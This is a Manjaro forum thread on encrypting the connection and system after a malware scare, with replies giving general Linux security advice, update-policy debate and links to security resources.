What are the methods of encrypting my internet connection, my whole OS and each individual application?

Hi. I’m sure you all know of the recent Russian virus (malware) and I would like to know what security measures can I take given the fact that I’ve been told that the only available secure OS that I can get is Temple OS.

Well, first of all you have to understand what encryption does and what it’s for. It’s not a magical solution that suddenly protects you against all kinds of baddies.

For instance, encrypting your filesystems ─ or the whole drive ─ is only useful against one thing, namely abuse of your login credentials and retrieval of your files after the theft of your computer. It’s not going to protect you against malware.

As for the internet, well, most (but not all) websites are now using end-to-end encryption of the connection ─ i.e. https instead of http ─ so that all traffic between a web browser and a server is encrypted. The purpose of this is to prevent that anyone sniffing your connection would be able to snoop logins and passwords. With http, all traffic was sent back and forth as plain text, while with https, all that a sniffer would get to see is an unintelligible stream of gibberish.

Lastly, the weakest link in computer security is and has always been the biological unit between the keyboard and the chair. In order to get your GNU/Linux system infected with malware, you would have to be doing something stupid, like running as the root user for your daily work, randomly clicking on untrusted links and randomly installing software from untrustworthy websites.

The best thing you can do is keep your system updated ─ after all, Manjaro is a (curated) rolling-release distribution, and you need to keep up with the evolution of the software in order to avoid breakage at some later stage ─ and maintain good system hygiene. Don’t use easy-to-guess passwords, don’t download anything from untrustworthy sources, and only use software from the repository.

And yes, it is true that there have been instances of compromised packages in the AUR ─ the optional Arch User Repository, for which Manjaro’s Pamac offers support ─ but those instances are rare, they are easily remedied by the Arch people, and as an end-user you can always inspect the PKGBUILD for the package to see what it pulls in and from where.

In overall, I would say, “Don’t let the fear porn bite you.” GNU/Linux isn’t Microsoft Windows ─ not even by a long shot ─ and what applies to Windows doesn’t necessarily apply to GNU/Linux. It’s an entirely different operating system design, with a different security model.

Windows started off as a graphical user interface for a single-tasking, single-user, non-networked operating system, i.e. MS-DOS. GNU/Linux is a UNIX-family operating system, and UNIX was designed from the ground up as a time-sharing multiuser operating system with built-in access control through a relatively simple but well thought-out permissions and file-ownership system, inspired by the Multics mainframe operating system.

That all said, you can of course also harden your system with frameworks such as SELinux and AppArmor ─ both are supported ─ but you may expect some breakage if you do, because not all software is able to handle the restrictions to (among other things) inter-process communication that these frameworks impose.

6 Likes

Ah, Updates and Security. That’s a long story. Sometimes you need updates to close a gap and sometimes it’s the update that implements the gap. Every once in a while mistakes happen.

I know I’m not in a position to question the efficiency of Manjaro devs but that’s also the reason why I would not trust a rolling release general purpose OS for upmost security.

Windows server 2019 is using build 1809 while consumer edition is now 2004.
Manjaro compares to consumer edition which gets all sorts of updates.

I love Manjaro and I don’t care if there will be some gaps, they’ll fix it on the next update. If you have sensitive data keep it somewhere else.

Security updates are pushed out immediately. They are not held back until the next system update. :wink:

But that’s what i mean by next update already. Next update is next update.

No idea what you are refering to.

People can recommend you many measures, most will be useless. You need to do your own research. This is already a summary which builds upon some knowledge: https://wiki.archlinux.org/index.php/Security
A less demanding (but incomplete) article: Linux Security - Manjaro

Who told you that? :wink: I mean, do your own research starting by exploring security oriented distros:
https://distrowatch.com/search.php?ostype=All&category=Security
(But avoid using those distros which are focused on penetration testing. You can read their manuals though to get an idea what attacks are possible.)
Maybe this list is even better:

https://distrowatch.com/search.php?ostype=All&category=Privacy

2 Likes

just avoid using all this Russian crap services like yandex, vivaldi browser (neither Russian, nor insecure - moderator’s note by eugen-b), vkontakte, etc